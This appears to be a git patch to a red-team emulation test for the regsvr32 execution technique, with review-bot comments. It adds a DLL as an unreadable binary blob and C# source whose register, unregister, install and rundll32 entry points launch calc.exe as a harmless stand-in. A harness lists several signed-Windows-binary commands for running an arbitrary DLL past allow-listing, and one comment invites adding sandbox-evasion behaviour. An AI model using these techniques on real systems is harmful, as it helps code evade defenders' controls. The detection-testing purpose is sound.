From 7fea6fc22a09feea67e2a7a43a1a482c5575d4e1 Mon Sep 17 00:00:00 2001
From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com>
Date: Mon, 3 Sep 2018 08:54:04 -0600
Subject: [PATCH] T1117 Cleanup/Fix
---
 atomics/T1117/T1117.yaml | 6 +-
 atomics/T1117/bin/AllTheThingsx86.dll | Bin 0 -> 5632 bytes
 atomics/T1117/src/AllTheThings.cs | 173 ++++++++++++++++++++++++++
 3 files changed, 176 insertions(+), 3 deletions(-)
 create mode 100755 atomics/T1117/bin/AllTheThingsx86.dll
 create mode 100644 atomics/T1117/src/AllTheThings.cs
diff --git a/atomics/T1117/T1117.yaml b/atomics/T1117/T1117.yaml
index 99ff938d..91948b5a 100644
--- a/atomics/T1117/T1117.yaml
+++ b/atomics/T1117/T1117.yaml
@@ -11,7 +11,7 @@ atomic_tests:
 filename:
 description: Name of the local file, include path.
 type: Path
- default: Regsvr32.sct
+ default: C:\AtomicRedTeam\atomics\T1117\bin\Regsvr32.sct
 executor:
 name: command_prompt
 command: |
@@ -39,8 +39,8 @@ atomic_tests:
 dll_name:
 description: Name of DLL to Execute, DLL Should export DllRegisterServer
 type: Path
- default: payload.dll
+ default: C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
 executor:
 name: command_prompt
 command: |
- regsvr32.exe #{dll_name}
+ "IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )" 
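Review bot: The new `command` line in the second hunk is wrapped in an outer pair of double quotes (`"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (...) ELSE (...)"`), so when this runs as a line of a batch file or is typed at a prompt, cmd.exe sees a quoted token instead of the `IF` keyword and the test is likely to fail with an unrecognized-command error rather than exercise the intended branch; whether the quotes survive depends on how the executor hands the line to cmd.exe, which is not visible here. Dropping the outer quotes, `IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE (regsvr32.exe /s #{dll_name})`, keeps the 32-bit regsvr32 selection that the x86 DLL needs on 64-bit hosts. Both hunks also replace relative defaults with absolute `C:\AtomicRedTeam\...` paths, so the tests now only resolve when the repository is checked out at that exact location; a short note in the `description` fields saying so would save users a confusing file-not-found failure.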
diff --git a/atomics/T1117/bin/AllTheThingsx86.dll b/atomics/T1117/bin/AllTheThingsx86.dll new file mode 100755 index 0000000000000000000000000000000000000000..eafffbf851f4cb51e0fb072cd8b7b5ec73a1999f GIT binary patch literal 5632 zcmeHLU2Ggz75-*yZyYxbf+msEQD_O^qG>6tNL!f3`HM_+iV zHrs8O2Ocn5fi_CmNSQiJuvjy!zz$8DvEL#P|8@B$F=3jJd0tfI-&z~9+cH2GrSB7_ zrTa4Qb4kR;vYHIvDE}bds=KZ=Tgjhk7?Y0FazsAAmB2n7Ydr|^EEc^=hb23*ftN*) zVP(u{XKg4M;K%7842qQL7%r0#TRLvGNy*ScI#8}pMcuW^4zc$jYeUHZ!wu|x^8Yvk zJ+iM@WNn&g!Rr>+Mr*t*M1HUGSMD3CZ7S)&0IFRd;ezhoZ+3B+wRK+%JJ=iwCfVcf zB-yo#@L2bwW*1i;iJId6F7Ck8L*2Euuc>RdsBPlRkxwFFtI1kG<)~kK#p7gPv zfxZEew7@0)g6q2TOI+}@IKkSPivq_hhoW&KrMEje=W=+LwCsh>({tHTw(paFkfu9_ zUB4j8EHq`DrX#Xd@pt1W_E13bAy(ODBIgvKir$*iCvxBoGxjotZf@`tW{7S0Dm>y% zjkky?yo+~;O@^SQ@s!3VH9oEJhQ^;6H;okD(f9`~*=DwwDeNM)W6(TAoG0$YidiCF zBc||*DYJjeys6!ZeUc0sjQ!UPZ%EU^{Vw4oo*npo!qIa};&}z{nIqJ_pt);%&(f-a zQquPq-S>rr`6eyV zbrQLiFjAHD?2;Eb6_peh#eF9jR@N=)i_y@p6@MrQ)1 zw;0{cV09&M%8PgD$_I8yRqWu(+Ncd5Co2i`tM%-0`gtdG3XNf%UUEun25SC{^PA4A zAY?w)I%DgYE_|Mu;)nJ^-&HslIFXugJXKp7qmEtn{4jEgAsClrJr~(Ql=T*Tgetlu z#;5Fxs`Wy5*M^^SypsP+m>&0oN(dTr{qn2|m)r=GG-a37u)mDlqW=s=Y}ch5S94LR zND`BF5H8v-W}+bP$EWw4=U~Wn^NWfPO&;dy67?!!(GOgwAP&g86S}VlW6M=Ph(g+N zJTj`NVa65}8>6l}tI7_Szh3Ps5XqbuY?5WYFcNnPHKNf0?xx4jK=H0=5-W zlbplh-c0MiEG47t@$hj(32pJz^{_&IQEQfAbQC$tMUi6^mRW&kU;N3Eb>_6RL z{+z#RquDZy)+P%^3yF>nVNHSdW)OHB@0{G3ZK16vMAE*u_506Wn18tc_Vw1+PF;Gg z0{YMIgf#W@c1Esz~sh_vLfi1nf^!ca#sllB? z$na3Fmpg}=H}I{(XXL(a!NKJ1BkCuGwuIVTYHy^t=hBEDaINTNrPrQPdL2qH=eHW? z-)!r@O~U6+Y6~mhawJjz9rl$>>?s!ua|QI1&#+FgzQwoSZ&}}CohAP{R-e^`++fU2 zZL9oyo9sg48mgy~w(ghzbOz)F2o^c@kaBX{t>@>^pV0baeFGUBX2)hSB+(qj6th5Pup>xoi0zx zEYH#fp0H95>eqLky*8yG`)!`Gjy`|20$yu=n??=#6j4jg>GEAHeOK%Bp!U~~0%`CS z|1pjo(INivK(l@hGj;>{Th1 zTVYC%ksBZ`!`M!pTC}6uQc?R}rNy<_h8V5OITxuR7{{i6_R#m%1{?F#2@L`mTr1tV9ieabxX7>w|T&KbR47Tp4D?sCv(J^cI&y5DCDcj_quzo8vQ?^^FBjc zKBHRVmyH@SaBmypN59VZ`mr0czA@*6ddv``33Y4*`nbYee9$Calls DllUnregisterServer + regsvr32 /s AllTheThings.dll --> Calls DllRegisterServer +5. 
+ rundll32 AllTheThings.dll,EntryPoint
+
+6.
+ odbcconf.exe /s /a { REGSVR AllTheThings.dll }
+
+7.
+ regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThings.dll
+
+
+Sample Harness.Bat
+
+[Begin]
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
+regsvr32 /s /u AllTheThings.dll
+regsvr32 /s AllTheThings.dll
+rundll32 AllTheThings.dll,EntryPoint
+odbcconf.exe /a { REGSVR AllTheThings.dll }
+regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThings.dll
+[End]
+
+
+*/
+
+[assembly: ApplicationActivation(ActivationOption.Server)]
+[assembly: ApplicationAccessControl(false)]
+
+public class Program
+{
+ public static void Main()
+ {
+ Console.WriteLine("Hello From Main...I Don't Do Anything");
+ //Add any behaviour here to throw off sandbox execution/analysts :)
+ }
+
+}
+
+public class Thing0
+{
+ public static void Exec()
+ {
+ ProcessStartInfo startInfo = new ProcessStartInfo();
+ startInfo.FileName = "calc.exe";
+ Process.Start(startInfo);
+ }
+
+ public static void ExecParam(string a)
+ {
+ MessageBox.Show(a);
+ }
+}
+
+[System.ComponentModel.RunInstaller(true)]
+public class Thing1 : System.Configuration.Install.Installer
+{
+ //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary. 
+ public override void Uninstall(System.Collections.IDictionary savedState)
+ {
+
+ Console.WriteLine("Hello There From Uninstall");
+ Thing0.Exec();
+
+ }
+
+}
+
+[ComVisible(true)]
+[Guid("31D2B969-7608-426E-9D8E-A09FC9A51680")]
+[ClassInterface(ClassInterfaceType.None)]
+[ProgId("dllguest.Bypass")]
+[Transaction(TransactionOption.Required)]
+public class Bypass : ServicedComponent
+{
+ public Bypass() { Console.WriteLine("I am a basic COM Object"); }
+
+ [ComRegisterFunction] //This executes if registration is successful
+ public static void RegisterClass(string key)
+ {
+ Console.WriteLine("I shouldn't really execute");
+ Thing0.Exec();
+ }
+
+ [ComUnregisterFunction] //This executes if registration fails
+ public static void UnRegisterClass(string key)
+ {
+ Console.WriteLine("I shouldn't really execute either.");
+ Thing0.Exec();
+ }
+
+ public void Exec() { Thing0.Exec(); }
+}
+
+class Exports
+{
+
+ //
+ //
+ //rundll32 entry point
+ [DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
+ public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
+ {
+ Thing0.Exec();
+ }
+
+ [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
+ public static bool DllRegisterServer()
+ {
+ Thing0.Exec();
+ return true;
+ }
+
+ [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
+ public static bool DllUnregisterServer()
+ {
+ Thing0.Exec();
+ return true;
+ }
+
+ [DllExport("DllInstall", CallingConvention = CallingConvention.StdCall)]
+ public static void DllInstall(bool bInstall, IntPtr a)
+ {
+ string b = Marshal.PtrToStringUni(a);
+ Thing0.ExecParam(b);
+ }
+
+
+}
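Review bot: The comment on `[ComUnregisterFunction]` in the `Bypass` class is inaccurate: that attribute marks the method the runtime invokes when the assembly is unregistered (the `regasm.exe /U` and `regsvr32 /s /u` steps listed in the header comment), not a handler that runs when registration fails, and the `[ComRegisterFunction]` comment likewise describes the registration pass itself rather than its success. Suggest `//Invoked by regasm/regsvcs while registering this type` and `//Invoked by regasm/regsvcs while unregistering this type (/U); not a failure handler`, so an analyst mapping a harness step to the code path that executed is not misled. The hunk header and the start of the file (usings, opening of the header comment) are swallowed by the preceding binary-patch residue and are not reviewable here.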